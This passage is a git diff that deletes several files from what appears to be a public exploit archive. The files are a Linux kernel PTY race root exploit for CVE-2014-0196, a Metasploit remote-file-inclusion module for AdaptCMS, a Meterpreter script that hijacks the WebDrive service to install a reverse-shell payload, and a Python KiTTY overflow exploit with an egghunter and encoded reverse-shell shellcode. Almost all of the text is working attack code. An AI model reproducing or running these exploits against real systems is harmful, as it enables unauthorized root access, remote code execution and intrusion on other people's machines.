@@ -1,220 +0,0 @@ -/* - * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race - * condition - * - * Slightly-less-than-POC privilege escalation exploit - * For kernels >= v3.14-rc1 - * - * Matthew Daley - * - * Usage: - * $ gcc cve-2014-0196-md.c -lutil -lpthread - * $ ./a.out - * [+] Resolving symbols - * [+] Resolved commit_creds: 0xffffffff81056694 - * [+] Resolved prepare_kernel_cred: 0xffffffff810568a7 - * [+] Doing once-off allocations - * [+] Attempting to overflow into a tty_struct............... - * [+] Got it :) - * # id - * uid=0(root) gid=0(root) groups=0(root) - * - * WARNING: The overflow placement is still less-than-ideal; there is a 1/4 - * chance that the overflow will go off the end of a slab. This does not - * necessarily lead to an immediate kernel crash, but you should be prepared - * for the worst (i.e. kernel oopsing in a bad state). In theory this would be - * avoidable by reading /proc/slabinfo on systems where it is still available - * to unprivileged users. - * - * Caveat: The vulnerability should be exploitable all the way from - * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in - * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer - * GFP_ATOMIC memory consumption") that make exploitation simpler, which this - * exploit relies on. - * - * Thanks to Jon Oberheide for his help on exploitation technique. 
- */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define TTY_MAGIC 0x5401 - -#define ONEOFF_ALLOCS 200 -#define RUN_ALLOCS 30 - -struct device; -struct tty_driver; -struct tty_operations; - -typedef struct { - int counter; -} atomic_t; - -struct kref { - atomic_t refcount; -}; - -struct tty_struct_header { - int magic; - struct kref kref; - struct device *dev; - struct tty_driver *driver; - const struct tty_operations *ops; -} overwrite; - -typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred); -typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); - -int master_fd, slave_fd; -char buf[1024] = {0}; -commit_creds_fn commit_creds; -prepare_kernel_cred_fn prepare_kernel_cred; - -int payload(void) { - commit_creds(prepare_kernel_cred(0)); - - return 0; -} - -unsigned long get_symbol(char *target_name) { - FILE *f; - unsigned long addr; - char dummy; - char name[256]; - int ret = 0; - - f = fopen("/proc/kallsyms", "r"); - if (f == NULL) - return 0; - - while (ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name); - if (ret == 0) { - fscanf(f, "%s\n", name); - continue; - } - - if (!strcmp(name, target_name)) { - printf("[+] Resolved %s: %p\n", target_name, (void *)addr); - - fclose(f); - return addr; - } - } - - printf("[-] Couldn't resolve \"%s\"\n", name); - - fclose(f); - return 0; -} - -void *overwrite_thread_fn(void *p) { - write(slave_fd, buf, 511); - - write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1)); - write(slave_fd, &overwrite, sizeof(overwrite)); -} - -int main() { - char scratch[1024] = {0}; - void *tty_operations[64]; - int i, temp_fd_1, temp_fd_2; - - for (i = 0; i < 64; ++i) - tty_operations[i] = payload; - - overwrite.magic = TTY_MAGIC; - overwrite.kref.refcount.counter = 0x1337; - overwrite.dev = (struct device *)scratch; - overwrite.driver = (struct tty_driver *)scratch; - overwrite.ops = (struct tty_operations 
*)tty_operations; - - puts("[+] Resolving symbols"); - - commit_creds = (commit_creds_fn)get_symbol("commit_creds"); - prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred"); - if (!commit_creds || !prepare_kernel_cred) - return 1; - - puts("[+] Doing once-off allocations"); - - for (i = 0; i < ONEOFF_ALLOCS; ++i) - if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) { - puts("[-] pty creation failed"); - return 1; - } - - printf("[+] Attempting to overflow into a tty_struct..."); - fflush(stdout); - - for (i = 0; ; ++i) { - struct termios t; - int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j; - pthread_t overwrite_thread; - - if (!(i & 0xfff)) { - putchar('.'); - fflush(stdout); - } - - if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) { - puts("\n[-] pty creation failed"); - return 1; - } - - for (j = 0; j < RUN_ALLOCS; ++j) - if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) { - puts("\n[-] pty creation failed"); - return 1; - } - - close(fds[RUN_ALLOCS / 2]); - close(fds2[RUN_ALLOCS / 2]); - - write(slave_fd, buf, 1); - - tcgetattr(master_fd, &t); - t.c_oflag &= ~OPOST; - t.c_lflag |= ECHO; - tcsetattr(master_fd, TCSANOW, &t); - - if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) { - puts("\n[-] Overwrite thread creation failed"); - return 1; - } - write(master_fd, "A", 1); - pthread_join(overwrite_thread, NULL); - - for (j = 0; j < RUN_ALLOCS; ++j) { - if (j == RUN_ALLOCS / 2) - continue; - - ioctl(fds[j], 0xdeadbeef); - ioctl(fds2[j], 0xdeadbeef); - - close(fds[j]); - close(fds2[j]); - } - - ioctl(master_fd, 0xdeadbeef); - ioctl(slave_fd, 0xdeadbeef); - - close(master_fd); - close(slave_fd); - - if (!setresuid(0, 0, 0)) { - setresgid(0, 0, 0); - - puts("\n[+] Got it :)"); - execl("/bin/bash", "/bin/bash", NULL); - } - } -} diff --git a/platforms/php/webapps/15237.txt b/platforms/php/webapps/15237.txt deleted file mode 100755 index aad0da8e6..000000000 
--- a/platforms/php/webapps/15237.txt
+++ /dev/null
@@ -1,83 +0,0 @@ -## -# ) ) ) ( ( ( ( ( ) ) -# ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( -# )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) -# ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ -#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) -#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / -# \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < -# |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ -# .WEB.ID -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::PHPInclude - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit', - 'Description' => %q{ - This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php. 
- - }, - 'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision:$', - 'References' => - [ - [ 'CVE', '2010-2618' ], - [ 'BID', '41116' ], - ], - 'Privileged' => false, - 'Payload' => - { - 'DisableNops' => true, - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Space' => 262144, # 256k - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], - 'DisclosureDate' => 'Oct 12 2010', - 'DefaultTarget' => 0)) - - register_options([ - OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']), - ], self.class) - end - - def php_exploit - - timeout = 0.01 - uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) - print_status("Trying uri #{uri}") - - response = send_request_raw( { - 'global' => true, - 'uri' => uri, - },timeout) - - if response and response.code != 200 - print_error("Server returned non-200 status code (#{response.code})") - end - - handler - end - -end \ No newline at end of file diff --git a/platforms/windows/local/11264.txt b/platforms/windows/local/11264.txt deleted file mode 100755 index 29c6ce597..000000000 --- a/platforms/windows/local/11264.txt +++ /dev/null 
@@ -1,119 +0,0 @@ -## -# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. -# -# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. -# Due to an empty security descriptor, a local attacker can gain elevated privileges. -# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3. -# Vulnerability mitigation featured. -# -# Credit: -# - Discovery - Nine:Situations:Group::bellick -# - Meterpreter script - Trancer -# -# References: -# - http://retrogod.altervista.org/9sg_south_river_priv.html -# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/ -# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606 -# - http://osvdb.org/show/osvdb/59080 -# -# mtrancer[@]gmail.com -# http://www.rec-sec.com -## - -# -# Options -# -opts = Rex::Parser::Arguments.new( - "-h" => [ false, "This help menu"], - "-m" => [ false, "Mitigate"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] -) - -# -# Default parameters -# - -rhost = Rex::Socket.source_address("1.2.3.4") -rport = 4444 -sname = 'WebDriveService' -pname = 'wdService.exe' - -# -# Option parsing -# -opts.parse(args) do |opt, idx, val| - case opt - when "-h" - print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.") - print_line(opts.usage) - raise Rex::Script::Completed - when "-m" - client.sys.process.get_processes().each do |m| - if ( m['name'] == pname ) - print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") - - # Set correct service security descriptor to mitigate the vulnerability - print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") - client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" 
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) - end - end - raise Rex::Script::Completed - when "-r" - rhost = val - when "-p" - rport = val.to_i - end -end - -client.sys.process.get_processes().each do |m| - if ( m['name'] == pname ) - - print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") - - # Build out the exe payload. - pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") - pay.datastore['LHOST'] = rhost - pay.datastore['LPORT'] = rport - raw = pay.generate - - exe = Msf::Util::EXE.to_win32pe(client.framework, raw) - - # Place our newly created exe in %TEMP% - tempdir = client.fs.file.expand_path("%TEMP%") - tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - print_status("Sending EXE payload '#{tempexe}'.") - fd = client.fs.file.new(tempexe, "wb") - fd.write(exe) - fd.close - - # Stop the vulnerable service - print_status("Stopping service \"#{sname}\"...") - client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) - - # Set exe payload as service binpath - print_status("Setting \"#{sname}\" to #{tempexe}...") - client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) - sleep(1) - - # Restart the service - print_status("Restarting the \"#{sname}\" service...") - client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) - - # Our handler to recieve the callback. 
- handler = client.framework.exploits.create("multi/handler") - handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" - handler.datastore['LHOST'] = rhost - handler.datastore['LPORT'] = rport - handler.datastore['ExitOnSession'] = false - - handler.exploit_simple( - 'Payload' => handler.datastore['PAYLOAD'], - 'RunAsJob' => true - ) - - # Set service binpath back to normal - client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) - - end -end diff --git a/platforms/windows/local/39120..py b/platforms/windows/local/39120..py deleted file mode 100755 index 8a3e9a2b0..000000000 --- a/platforms/windows/local/39120..py +++ /dev/null 
@@ -1,412 +0,0 @@ -# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10) -# Date: 28/12/2015 -# Exploit Author: Guillaume Kaddouch -# Twitter: @gkweb76 -# Blog: http://networkfilter.blogspot.com -# GitHub: https://github.com/gkweb76/exploits -# Vendor Homepage: http://www.9bis.net/kitty/ -# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe -# Version: 0.65.0.2p -# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR) -# Category: Local - - -""" -Disclosure Timeline: --------------------- -2015-09-13: Vulnerability discovered -2015-09-26: Vendor contacted -2015-09-28: Vendor answer -2015-10-09: KiTTY 0.65.0.3p released, still vulnerable -2015-10-20: KiTTY 0.65.1.1p released, still vulnerable -2015-11-15: KiTTY 0.66.6.1p released, seems fixed -2015-12-28: exploit published - -Description : -------------- -A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write -an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash -the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are -likely to be vulnerable too. - -WinXP -> Local Code Execution -Win7 -> Denial Of Service -Win8.1 -> Denial Of Service -Win10 -> Denial Of Service - -Instructions: -------------- -- Run exploit -- Launch KiTTY, select "EvilSession" on the session list, then click "Load". - -Exploitation: -------------- -When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232. -As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. 
However, as the memory area -we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final -shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell -is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes): - -guillaume@kali64:~/tools$ nc -nlvp 4444 -listening on [any] 4444 ... -connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955 -Microsoft Windows XP [version 5.1.2600] -(C) Copyright 1985-2001 Microsoft Corp. - -C:\kitty\App\KiTTY> - -""" - -egg = "w00t" # \x77\x30\x30\x74 - -# Windows NtAccessCheckAndAuditAlarm EggHunter -# Size: 32 bytes -egghunter = ( -"\x66\x81\xca\xff\x0f" # or dx,0x0fff -"\x42" # inc edx -"\x52" # push edx -"\x6a\x02" # push byte +0x02 -"\x58" # pop eax -"\xcd\x2e" # int 0x2e -"\x3c\x05" # cmp al,0x5 -"\x5a" # pop edx -"\x74\xef" # jz 0x0 -"\xb8\x77\x30\x30\x74" # mov eax,0x74303077 ; egg -"\x8b\xfa" # mov edi,edx -"\xaf" # scasd -"\x75\xea" # jnz 0x5 -"\xaf" # scasd -"\x75\xe7" # jnz 0x5 -"\xff\xe7" # jmp edi -) - -# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want) -# Encoder: x86/shikata_ga_nai -# Bad chars: '\x00\x0a\x0d\x5c' -# Size: 351 bytes -shellcode = ( -"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" -"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e" -"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35" -"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60" -"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14" -"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a" -"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48" -"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7" -"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8" -"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c" 
-"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06" -"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a" -"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75" -"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe" -"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5" -"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae" -"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9" -"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac" -"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78" -"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5" -"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f" -"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc" -"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68" -"\xc3\x45\x64\xdf\xe4\x4f" -) - -junk = '\x41' * 1232 -ret = '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll -nops = '\x90' * 8 -eggmark = egg * 2 -padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter)) - -payload1 = junk + ret + egghunter + padding # Egg Hunter -payload2 = eggmark + nops + shellcode # Final Shellcode - -# A whole KiTTY session file, written to \Sessions\EvilSession" -buffer = "PortKnocking\\\\\r" -buffer += "ACSinUTF\\0\\\r" -buffer += "Comment\\\\\r" -buffer += "CtrlTabSwitch\\0\\\r" -buffer += "Password\\1350b\\\r" -buffer += "ForegroundOnBell\\0\\\r" -buffer += "SaveWindowPos\\0\\\r" -buffer += "WindowState\\0\\\r" -buffer += "TermYPos\\-1\\\r" -buffer += "TermXPos\\-1\\\r" -buffer += "LogTimeRotation\\0\\\r" -buffer += "Folder\\Default\\\r" -buffer += "AutocommandOut\\\\\r" -buffer += "Autocommand\\\\\r" -buffer += "LogTimestamp\\\\\r" -buffer += "AntiIdle\\\\\r" -buffer += "ScriptfileContent\\\\\r" -buffer += "Scriptfile\\\\\r" -buffer += "SFTPConnect\\\\\r" -buffer += "IconeFile\\\\\r" -buffer += "Icone\\1\\\r" -buffer += "SaveOnExit\\0\\\r" -buffer += "Fullscreen\\0\\\r" -buffer += "Maximize\\0\\\r" 
-buffer += "SendToTray\\0\\\r" -buffer += "TransparencyValue\\0\\\r" -buffer += "zDownloadDir\\C%3A%5C\\\r" -buffer += "szOptions\\-e%20-v\\\r" -buffer += "szCommand\\\\\r" -buffer += "rzOptions\\-e%20-v\\\r" -buffer += "rzCommand\\\\\r" -buffer += "CygtermCommand\\\\\r" -buffer += "Cygterm64\\0\\\r" -buffer += "CygtermAutoPath\\1\\\r" -buffer += "CygtermAltMetabit\\0\\\r" -buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r" -buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r" -buffer += "HyperlinkBrowser\\\\\r" -buffer += "HyperlinkBrowserUseDefault\\1\\\r" -buffer += "HyperlinkUseCtrlClick\\1\\\r" -buffer += "HyperlinkUnderline\\0\\\r" -buffer += "FailureReconnect\\0\\\r" -buffer += "WakeupReconnect\\0\\\r" -buffer += "SSHManualHostKeys\\\\\r" -buffer += "ConnectionSharingDownstream\\1\\\r" -buffer += "ConnectionSharingUpstream\\1\\\r" -buffer += "ConnectionSharing\\0\\\r" -buffer += "WindowClass\\\\\r" -buffer += "SerialFlowControl\\1\\\r" -buffer += "SerialParity\\0\\\r" -buffer += "SerialStopHalfbits\\2\\\r" -buffer += "SerialDataBits\\8\\\r" -buffer += "SerialSpeed\\9600\\\r" -buffer += "SerialLine\\COM1\\\r" -buffer += "ShadowBoldOffset\\1\\\r" -buffer += "ShadowBold\\0\\\r" -buffer += "WideBoldFontHeight\\0\\\r" -buffer += "WideBoldFontCharSet\\0\\\r" -buffer += "WideBoldFontIsBold\\0\\\r" -buffer += "WideBoldFont\\\\\r" -buffer += "WideFontHeight\\0\\\r" -buffer += "WideFontCharSet\\0\\\r" -buffer += "WideFontIsBold\\0\\\r" -buffer += "WideFont\\\\\r" -buffer += "BoldFontHeight\\0\\\r" -buffer += "BoldFontCharSet\\0\\\r" -buffer += "BoldFontIsBold\\0\\\r" -buffer += "BoldFont\\\\\r" -buffer += "ScrollbarOnLeft\\0\\\r" -buffer += "LoginShell\\1\\\r" -buffer += "StampUtmp\\1\\\r" 
-buffer += "BugChanReq\\0\\\r" -buffer += "BugWinadj\\0\\\r" -buffer += "BugOldGex2\\0\\\r" -buffer += "BugMaxPkt2\\0\\\r" -buffer += "BugRekey2\\0\\\r" -buffer += "BugPKSessID2\\0\\\r" -buffer += "BugRSAPad2\\0\\\r" -buffer += "BugDeriveKey2\\0\\\r" -buffer += "BugHMAC2\\0\\\r" -buffer += "BugIgnore2\\0\\\r" -buffer += "BugRSA1\\0\\\r" -buffer += "BugPlainPW1\\0\\\r" -buffer += "BugIgnore1\\0\\\r" -buffer += "PortForwardings\\\\\r" -buffer += "RemotePortAcceptAll\\0\\\r" -buffer += "LocalPortAcceptAll\\0\\\r" -buffer += "X11AuthFile\\\\\r" -buffer += "X11AuthType\\1\\\r" -buffer += "X11Display\\\\\r" -buffer += "X11Forward\\0\\\r" -buffer += "BlinkText\\0\\\r" -buffer += "BCE\\1\\\r" -buffer += "LockSize\\0\\\r" -buffer += "EraseToScrollback\\1\\\r" -buffer += "ScrollOnDisp\\1\\\r" -buffer += "ScrollOnKey\\0\\\r" -buffer += "ScrollBarFullScreen\\0\\\r" -buffer += "ScrollBar\\1\\\r" -buffer += "CapsLockCyr\\0\\\r" -buffer += "Printer\\\\\r" -buffer += "UTF8Override\\1\\\r" -buffer += "CJKAmbigWide\\0\\\r" -buffer += "LineCodePage\\\\\r" -buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r" -buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r" -buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r" -buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r" -buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r" -buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r" -buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r" -buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r" -buffer += "MouseOverride\\1\\\r" -buffer += "RectSelect\\0\\\r" -buffer += "MouseIsXterm\\0\\\r" -buffer += "PasteRTF\\0\\\r" -buffer += "RawCNP\\0\\\r" -buffer += "Colour33\\187,187,187\\\r" 
-buffer += "Colour32\\0,0,0\\\r" -buffer += "Colour31\\187,187,187\\\r" -buffer += "Colour30\\0,187,187\\\r" -buffer += "Colour29\\187,0,187\\\r" -buffer += "Colour28\\0,0,187\\\r" -buffer += "Colour27\\187,187,0\\\r" -buffer += "Colour26\\0,187,0\\\r" -buffer += "Colour25\\187,0,0\\\r" -buffer += "Colour24\\0,0,0\\\r" -buffer += "Colour23\\0,0,0\\\r" -buffer += "Colour22\\187,187,187\\\r" -buffer += "Colour21\\255,255,255\\\r" -buffer += "Colour20\\187,187,187\\\r" -buffer += "Colour19\\85,255,255\\\r" -buffer += "Colour18\\0,187,187\\\r" -buffer += "Colour17\\255,85,255\\\r" -buffer += "Colour16\\187,0,187\\\r" -buffer += "Colour15\\85,85,255\\\r" -buffer += "Colour14\\0,0,187\\\r" -buffer += "Colour13\\255,255,85\\\r" -buffer += "Colour12\\187,187,0\\\r" -buffer += "Colour11\\85,255,85\\\r" -buffer += "Colour10\\0,187,0\\\r" -buffer += "Colour9\\255,85,85\\\r" -buffer += "Colour8\\187,0,0\\\r" -buffer += "Colour7\\85,85,85\\\r" -buffer += "Colour6\\0,0,0\\\r" -buffer += "Colour5\\0,255,0\\\r" -buffer += "Colour4\\0,0,0\\\r" -buffer += "Colour3\\85,85,85\\\r" -buffer += "Colour2\\0,0,0\\\r" -buffer += "Colour1\\255,255,255\\\r" -buffer += "Colour0\\187,187,187\\\r" -buffer += "SelectedAsColour\\0\\\r" -buffer += "UnderlinedAsColour\\0\\\r" -buffer += "BoldAsColourTest\\1\\\r" -buffer += "DisableBottomButtons\\1\\\r" -buffer += "WindowHasSysMenu\\1\\\r" -buffer += "WindowMaximizable\\1\\\r" -buffer += "WindowMinimizable\\1\\\r" -buffer += "WindowClosable\\1\\\r" -buffer += "BoldAsColour\\1\\\r" -buffer += "Xterm256Colour\\1\\\r" -buffer += "ANSIColour\\1\\\r" -buffer += "TryPalette\\0\\\r" -buffer += "UseSystemColours\\0\\\r" -buffer += "FontVTMode\\4\\\r" -buffer += "FontQuality\\0\\\r" -buffer += "FontHeight\\10\\\r" -buffer += "FontCharSet\\0\\\r" -buffer += "FontIsBold\\0\\\r" -buffer += "Font\\Courier%20New\\\r" -buffer += "TermHeight\\24\\\r" -buffer += "TermWidth\\80\\\r" -buffer += "WinTitle\\\\\r" -buffer += "WinNameAlways\\1\\\r" -buffer += 
"DisableBidi\\0\\\r" -buffer += "DisableArabicShaping\\0\\\r" -buffer += "CRImpliesLF\\0\\\r" -buffer += "LFImpliesCR\\0\\\r" -buffer += "AutoWrapMode\\1\\\r" -buffer += "DECOriginMode\\0\\\r" -buffer += "ScrollbackLines\\10000\\\r" -buffer += "BellOverloadS\\5000\\\r" -buffer += "BellOverloadT\\2000\\\r" -buffer += "BellOverloadN\\5\\\r" -buffer += "BellOverload\\1\\\r" -buffer += "BellWaveFile\\\\\r" -buffer += "BeepInd\\0\\\r" -buffer += "Beep\\1\\\r" -buffer += "BlinkCur\\0\\\r" -buffer += "CurType\\0\\\r" -buffer += "WindowBorder\\1\\\r" -buffer += "SunkenEdge\\0\\\r" -buffer += "HideMousePtr\\0\\\r" -buffer += "FullScreenOnAltEnter\\0\\\r" -buffer += "AlwaysOnTop\\0\\\r" -buffer += "Answerback\\KiTTY\\\r" -buffer += "LocalEdit\\2\\\r" -buffer += "LocalEcho\\2\\\r" -buffer += "TelnetRet\\1\\\r" -buffer += "TelnetKey\\0\\\r" -buffer += "CtrlAltKeys\\1\\\r" -buffer += "ComposeKey\\0\\\r" -buffer += "AltOnly\\0\\\r" -buffer += "AltSpace\\0\\\r" -buffer += "AltF4\\1\\\r" -buffer += "NetHackKeypad\\0\\\r" -buffer += "ApplicationKeypad\\0\\\r" -buffer += "ApplicationCursorKeys\\0\\\r" -buffer += "NoRemoteCharset\\0\\\r" -buffer += "NoDBackspace\\0\\\r" -buffer += "RemoteQTitleAction\\1\\\r" -buffer += "NoRemoteWinTitle\\0\\\r" -buffer += "NoAltScreen\\0\\\r" -buffer += "NoRemoteResize\\0\\\r" -buffer += "NoMouseReporting\\0\\\r" -buffer += "NoApplicationCursors\\0\\\r" -buffer += "NoApplicationKeys\\0\\\r" -buffer += "LinuxFunctionKeys\\0\\\r" -buffer += "RXVTHomeEnd\\0\\\r" -buffer += "BackspaceIsDelete\\1\\\r" -buffer += "PassiveTelnet\\0\\\r" -buffer += "RFCEnviron\\0\\\r" -buffer += "RemoteCommand\\\\\r" -buffer += "PublicKeyFile\\\\\r" -buffer += "SSH2DES\\0\\\r" -buffer += "SshProt\\3\\\r" -buffer += "SshNoShell\\0\\\r" -buffer += "GSSCustom\\\\\r" -buffer += "GSSLibs\\gssapi32,sspi,custom\\\r" -buffer += "AuthGSSAPI\\1\\\r" -buffer += "AuthKI\\1\\\r" -buffer += "AuthTIS\\0\\\r" -buffer += "SshBanner\\1\\\r" -buffer += "SshNoAuth\\0\\\r" -buffer += 
